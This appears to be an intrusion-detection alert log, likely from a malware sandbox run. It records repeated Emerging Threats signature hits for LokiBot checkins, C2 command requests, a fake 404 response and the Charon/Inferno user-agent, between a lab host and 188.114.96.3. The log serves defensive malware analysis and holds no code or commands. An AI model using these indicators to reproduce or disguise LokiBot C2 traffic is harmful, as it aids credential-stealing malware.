2024-09-25T15:29:08.155785+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55909	188.114.96.3	80	TCP
2024-09-25T15:29:08.155785+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55909	188.114.96.3	80	TCP
2024-09-25T15:29:08.160820+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55909	TCP
2024-09-25T15:29:08.319578+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55910	188.114.96.3	80	TCP
2024-09-25T15:29:08.319578+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55910	188.114.96.3	80	TCP
2024-09-25T15:29:08.319578+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55910	188.114.96.3	80	TCP
2024-09-25T15:29:09.003544+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55910	188.114.96.3	80	TCP
2024-09-25T15:29:09.003544+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55910	188.114.96.3	80	TCP
2024-09-25T15:29:09.008486+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55910	TCP
2024-09-25T15:29:09.181026+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55911	188.114.96.3	80	TCP
2024-09-25T15:29:09.181026+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55911	188.114.96.3	80	TCP
2024-09-25T15:29:09.181026+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55911	188.114.96.3	80	TCP
2024-09-25T15:29:09.872961+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55911	188.114.96.3	80	TCP
2024-09-25T15:29:09.872961+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55911	188.114.96.3	80	TCP
2024-09-25T15:29:09.877822+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55911	TCP
2024-09-25T15:29:10.039622+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55912	188.114.96.3	80	TCP
2024-09-25T15:29:10.039622+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55912	188.114.96.3	80	TCP
2024-09-25T15:29:10.039622+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55912	188.114.96.3	80	TCP
2024-09-25T15:29:10.728142+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55912	188.114.96.3	80	TCP
2024-09-25T15:29:10.728142+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55912	188.114.96.3	80	TCP
2024-09-25T15:29:10.733142+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55912	TCP
2024-09-25T15:29:10.892410+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55913	188.114.96.3	80	TCP
2024-09-25T15:29:10.892410+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55913	188.114.96.3	80	TCP
2024-09-25T15:29:10.892410+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55913	188.114.96.3	80	TCP
2024-09-25T15:29:11.581836+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55913	188.114.96.3	80	TCP
2024-09-25T15:29:11.581836+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55913	188.114.96.3	80	TCP
2024-09-25T15:29:11.588290+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55913	TCP
2024-09-25T15:29:11.755447+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55914	188.114.96.3	80	TCP
2024-09-25T15:29:11.755447+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55914	188.114.96.3	80	TCP
2024-09-25T15:29:11.755447+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55914	188.114.96.3	80	TCP
2024-09-25T15:29:12.445970+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55914	188.114.96.3	80	TCP
2024-09-25T15:29:12.445970+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55914	188.114.96.3	80	TCP
2024-09-25T15:29:12.450993+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55914	TCP
2024-09-25T15:29:12.608011+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55915	188.114.96.3	80	TCP
2024-09-25T15:29:12.608011+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55915	188.114.96.3	80	TCP
2024-09-25T15:29:12.608011+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55915	188.114.96.3	80	TCP
2024-09-25T15:29:13.328556+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55915	188.114.96.3	80	TCP
2024-09-25T15:29:13.328556+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55915	188.114.96.3	80	TCP
2024-09-25T15:29:13.333492+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55915	TCP
2024-09-25T15:29:13.487014+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55916	188.114.96.3	80	TCP
2024-09-25T15:29:13.487014+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55916	188.114.96.3	80	TCP
2024-09-25T15:29:13.487014+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55916	188.114.96.3	80	TCP
2024-09-25T15:29:14.284533+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55916	188.114.96.3	80	TCP
2024-09-25T15:29:14.284533+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55916	188.114.96.3	80	TCP
2024-09-25T15:29:14.289431+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55916	TCP
2024-09-25T15:29:14.457362+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55917	188.114.96.3	80	TCP
2024-09-25T15:29:14.457362+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55917	188.114.96.3	80	TCP
2024-09-25T15:29:14.457362+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55917	188.114.96.3	80	TCP
2024-09-25T15:29:15.163543+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55917	188.114.96.3	80	TCP
2024-09-25T15:29:15.163543+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55917	188.114.96.3	80	TCP
2024-09-25T15:29:15.172021+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55917	TCP
2024-09-25T15:29:15.345683+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55918	188.114.96.3	80	TCP
2024-09-25T15:29:15.345683+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55918	188.114.96.3	80	TCP
2024-09-25T15:29:15.345683+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55918	188.114.96.3	80	TCP
2024-09-25T15:29:16.082398+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55918	188.114.96.3	80	TCP
2024-09-25T15:29:16.082398+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55918	188.114.96.3	80	TCP
2024-09-25T15:29:16.087444+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55918	TCP
2024-09-25T15:29:16.357807+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55919	188.114.96.3	80	TCP
2024-09-25T15:29:16.357807+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55919	188.114.96.3	80	TCP
2024-09-25T15:29:16.357807+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55919	188.114.96.3	80	TCP
2024-09-25T15:29:17.069655+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55919	188.114.96.3	80	TCP
2024-09-25T15:29:17.069655+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55919	188.114.96.3	80	TCP
2024-09-25T15:29:17.074546+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55919	TCP
2024-09-25T15:29:17.230322+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55920	188.114.96.3	80	TCP
2024-09-25T15:29:17.230322+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55920	188.114.96.3	80	TCP
2024-09-25T15:29:17.230322+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55920	188.114.96.3	80	TCP
2024-09-25T15:29:17.927204+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55920	188.114.96.3	80	TCP
2024-09-25T15:29:17.927204+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55920	188.114.96.3	80	TCP
2024-09-25T15:29:17.932139+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55920	TCP
2024-09-25T15:29:18.111648+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55921	188.114.96.3	80	TCP
2024-09-25T15:29:18.111648+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55921	188.114.96.3	80	TCP
2024-09-25T15:29:18.111648+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55921	188.114.96.3	80	TCP
2024-09-25T15:29:18.781204+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55921	188.114.96.3	80	TCP
2024-09-25T15:29:18.781204+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55921	188.114.96.3	80	TCP
2024-09-25T15:29:18.786816+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55921	TCP
2024-09-25T15:29:18.948583+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55922	188.114.96.3	80	TCP
2024-09-25T15:29:18.948583+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55922	188.114.96.3	80	TCP
2024-09-25T15:29:18.948583+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55922	188.114.96.3	80	TCP
2024-09-25T15:29:19.609687+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55922	188.114.96.3	80	TCP
2024-09-25T15:29:19.609687+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55922	188.114.96.3	80	TCP
2024-09-25T15:29:19.614844+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55922	TCP
2024-09-25T15:29:19.785848+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55923	188.114.96.3	80	TCP
2024-09-25T15:29:19.785848+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55923	188.114.96.3	80	TCP
2024-09-25T15:29:19.785848+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55923	188.114.96.3	80	TCP
2024-09-25T15:29:20.495550+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55923	188.114.96.3	80	TCP
2024-09-25T15:29:20.495550+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55923	188.114.96.3	80	TCP
2024-09-25T15:29:20.501107+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55923	TCP
2024-09-25T15:29:20.658125+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55924	188.114.96.3	80	TCP
2024-09-25T15:29:20.658125+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55924	188.114.96.3	80	TCP
2024-09-25T15:29:20.658125+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55924	188.114.96.3	80	TCP
2024-09-25T15:29:21.686655+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55924	188.114.96.3	80	TCP
2024-09-25T15:29:21.686655+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55924	188.114.96.3	80	TCP
2024-09-25T15:29:21.691492+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55924	TCP
2024-09-25T15:29:21.877333+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55925	188.114.96.3	80	TCP
2024-09-25T15:29:21.877333+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55925	188.114.96.3	80	TCP
2024-09-25T15:29:21.877333+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55925	188.114.96.3	80	TCP
2024-09-25T15:29:22.674104+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55925	188.114.96.3	80	TCP
2024-09-25T15:29:22.674104+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55925	188.114.96.3	80	TCP
2024-09-25T15:29:22.680605+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55925	TCP
2024-09-25T15:29:22.966391+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55926	188.114.96.3	80	TCP
2024-09-25T15:29:22.966391+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55926	188.114.96.3	80	TCP
2024-09-25T15:29:22.966391+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55926	188.114.96.3	80	TCP
2024-09-25T15:29:23.754090+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55926	188.114.96.3	80	TCP
2024-09-25T15:29:23.754090+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55926	188.114.96.3	80	TCP
2024-09-25T15:29:23.758949+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55926	TCP
2024-09-25T15:29:23.928498+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55927	188.114.96.3	80	TCP
2024-09-25T15:29:23.928498+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55927	188.114.96.3	80	TCP
2024-09-25T15:29:23.928498+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55927	188.114.96.3	80	TCP
2024-09-25T15:29:24.756018+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55927	188.114.96.3	80	TCP
2024-09-25T15:29:24.756018+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55927	188.114.96.3	80	TCP
2024-09-25T15:29:24.760805+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55927	TCP
2024-09-25T15:29:24.921645+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55928	188.114.96.3	80	TCP
2024-09-25T15:29:24.921645+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55928	188.114.96.3	80	TCP
2024-09-25T15:29:24.921645+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55928	188.114.96.3	80	TCP
2024-09-25T15:29:26.878403+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55928	188.114.96.3	80	TCP
2024-09-25T15:29:26.878403+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55928	188.114.96.3	80	TCP
2024-09-25T15:29:26.883421+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55928	TCP
2024-09-25T15:29:27.055675+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55929	188.114.96.3	80	TCP
2024-09-25T15:29:27.055675+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55929	188.114.96.3	80	TCP
2024-09-25T15:29:27.055675+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55929	188.114.96.3	80	TCP
2024-09-25T15:29:27.710722+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55929	188.114.96.3	80	TCP
2024-09-25T15:29:27.710722+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55929	188.114.96.3	80	TCP
2024-09-25T15:29:27.715578+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55929	TCP
2024-09-25T15:29:27.870221+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55931	188.114.96.3	80	TCP
2024-09-25T15:29:27.870221+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55931	188.114.96.3	80	TCP
2024-09-25T15:29:27.870221+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55931	188.114.96.3	80	TCP
2024-09-25T15:29:28.623111+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55931	188.114.96.3	80	TCP
2024-09-25T15:29:28.623111+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55931	188.114.96.3	80	TCP
2024-09-25T15:29:28.631311+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55931	TCP
2024-09-25T15:29:28.942773+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55932	188.114.96.3	80	TCP
2024-09-25T15:29:28.942773+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55932	188.114.96.3	80	TCP
2024-09-25T15:29:28.942773+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55932	188.114.96.3	80	TCP
2024-09-25T15:29:29.616024+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55932	188.114.96.3	80	TCP
2024-09-25T15:29:29.616024+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55932	188.114.96.3	80	TCP
2024-09-25T15:29:29.620789+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55932	TCP
2024-09-25T15:29:29.777253+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55933	188.114.96.3	80	TCP
2024-09-25T15:29:29.777253+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55933	188.114.96.3	80	TCP
2024-09-25T15:29:29.777253+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55933	188.114.96.3	80	TCP
2024-09-25T15:29:30.431091+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55933	188.114.96.3	80	TCP
2024-09-25T15:29:30.431091+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55933	188.114.96.3	80	TCP
2024-09-25T15:29:30.436181+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55933	TCP
2024-09-25T15:29:30.591674+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55934	188.114.96.3	80	TCP
2024-09-25T15:29:30.591674+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55934	188.114.96.3	80	TCP
2024-09-25T15:29:30.591674+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55934	188.114.96.3	80	TCP
2024-09-25T15:29:31.557337+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55934	188.114.96.3	80	TCP
2024-09-25T15:29:31.557337+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55934	188.114.96.3	80	TCP
2024-09-25T15:29:31.579554+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55934	TCP
2024-09-25T15:29:31.906770+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55935	188.114.96.3	80	TCP
2024-09-25T15:29:31.906770+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55935	188.114.96.3	80	TCP
2024-09-25T15:29:31.906770+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55935	188.114.96.3	80	TCP
2024-09-25T15:29:32.624051+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55935	188.114.96.3	80	TCP
2024-09-25T15:29:32.624051+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55935	188.114.96.3	80	TCP
2024-09-25T15:29:32.628954+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55935	TCP
2024-09-25T15:29:32.797954+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55936	188.114.96.3	80	TCP
2024-09-25T15:29:32.797954+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55936	188.114.96.3	80	TCP
2024-09-25T15:29:32.797954+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55936	188.114.96.3	80	TCP
2024-09-25T15:29:33.508697+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55936	188.114.96.3	80	TCP
2024-09-25T15:29:33.508697+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55936	188.114.96.3	80	TCP
2024-09-25T15:29:33.513537+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55936	TCP
2024-09-25T15:29:33.663752+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55937	188.114.96.3	80	TCP
2024-09-25T15:29:33.663752+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55937	188.114.96.3	80	TCP
2024-09-25T15:29:33.663752+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55937	188.114.96.3	80	TCP
2024-09-25T15:29:34.368849+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55937	188.114.96.3	80	TCP
2024-09-25T15:29:34.368849+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55937	188.114.96.3	80	TCP
2024-09-25T15:29:34.373954+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55937	TCP
2024-09-25T15:29:34.519787+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55938	188.114.96.3	80	TCP
2024-09-25T15:29:34.519787+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55938	188.114.96.3	80	TCP
2024-09-25T15:29:34.519787+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55938	188.114.96.3	80	TCP
2024-09-25T15:29:35.193903+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55938	188.114.96.3	80	TCP
2024-09-25T15:29:35.193903+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55938	188.114.96.3	80	TCP
2024-09-25T15:29:35.198670+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55938	TCP
2024-09-25T15:29:35.353459+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55939	188.114.96.3	80	TCP
2024-09-25T15:29:35.353459+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55939	188.114.96.3	80	TCP
2024-09-25T15:29:35.353459+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55939	188.114.96.3	80	TCP
2024-09-25T15:29:36.042891+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55939	188.114.96.3	80	TCP
2024-09-25T15:29:36.042891+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55939	188.114.96.3	80	TCP
2024-09-25T15:29:36.047855+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55939	TCP
2024-09-25T15:29:36.192350+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55940	188.114.96.3	80	TCP
2024-09-25T15:29:36.192350+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55940	188.114.96.3	80	TCP
2024-09-25T15:29:36.192350+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55940	188.114.96.3	80	TCP
2024-09-25T15:29:36.930414+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55940	188.114.96.3	80	TCP
2024-09-25T15:29:36.930414+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55940	188.114.96.3	80	TCP
2024-09-25T15:29:36.935469+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55940	TCP
2024-09-25T15:29:37.117852+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55941	188.114.96.3	80	TCP
2024-09-25T15:29:37.117852+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55941	188.114.96.3	80	TCP
2024-09-25T15:29:37.117852+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55941	188.114.96.3	80	TCP
2024-09-25T15:29:37.927518+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55941	188.114.96.3	80	TCP
2024-09-25T15:29:37.927518+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55941	188.114.96.3	80	TCP
2024-09-25T15:29:37.932328+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55941	TCP
2024-09-25T15:29:38.099928+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55942	188.114.96.3	80	TCP
2024-09-25T15:29:38.099928+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55942	188.114.96.3	80	TCP
2024-09-25T15:29:38.099928+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55942	188.114.96.3	80	TCP
2024-09-25T15:29:38.890390+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55942	188.114.96.3	80	TCP
2024-09-25T15:29:38.890390+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55942	188.114.96.3	80	TCP
2024-09-25T15:29:38.895251+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55942	TCP
2024-09-25T15:29:39.059740+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55943	188.114.96.3	80	TCP
2024-09-25T15:29:39.059740+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55943	188.114.96.3	80	TCP
2024-09-25T15:29:39.059740+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55943	188.114.96.3	80	TCP
2024-09-25T15:29:39.761200+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55943	188.114.96.3	80	TCP
2024-09-25T15:29:39.761200+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55943	188.114.96.3	80	TCP
2024-09-25T15:29:39.772496+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55943	TCP
2024-09-25T15:29:39.928784+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55944	188.114.96.3	80	TCP
2024-09-25T15:29:39.928784+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55944	188.114.96.3	80	TCP
